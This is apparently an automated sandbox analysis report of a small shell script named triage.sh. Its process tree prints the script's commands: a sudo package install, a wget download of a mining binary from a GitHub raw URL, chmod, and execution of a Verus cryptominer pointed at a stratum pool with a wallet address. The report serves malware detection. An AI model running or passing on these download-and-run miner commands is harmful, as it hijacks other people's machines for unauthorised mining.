Analysis

  • max time kernel
    0s
  • max time network
    1679s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240508-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    14-07-2024 09:08

General

  • Target

    triage.sh

  • Size

    338B

  • MD5

    dead3dccf4825eb422f4dac04f2d8279

  • SHA1

    61285497f6daecf9d6d6128d5ced6f19057f93bd

  • SHA256

    6df4fd30bb503ece3c987d6932d355fa7da868fa28f901b9781e6fd8df1bf4db

  • SHA512

    c4c5fc0a655488ea60b4d5801cab925e180e3d018f88e9238eb9bc794ddc73ec44059fad796cb1655fed44a7c861990d5960eb7a41f8fa4a24390cb27cd1f55b

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Reads runtime system information (3 IoCs)

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/triage.sh (depth 1, PID 1516)
    /tmp/triage.sh
    • /usr/bin/sudo (depth 2, PID 1517) – Reads runtime system information
      sudo apt-get install libcurl4-openssl-dev libssl-dev libomp-dev libjansson-dev automake autotools-dev build-essential -y
    • /usr/bin/wget (depth 2, PID 1518)
      wget https://raw.githubusercontent.com/MomboteQ/Free-Crypto-Mining/main/verus/cc
    • /bin/chmod (depth 2, PID 1522)
      chmod +x cc
    • /usr/bin/clear (depth 2, PID 1523)
      clear
    • /usr/bin/nproc (depth 2, PID 1524)
      nproc
    • /tmp/cc (depth 2, PID 1528)
      ./cc -a verus -o stratum+tcp://verus.farm:9999 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Linux -p x -t 1

Network

MITRE ATT&CK Enterprise v15

Downloads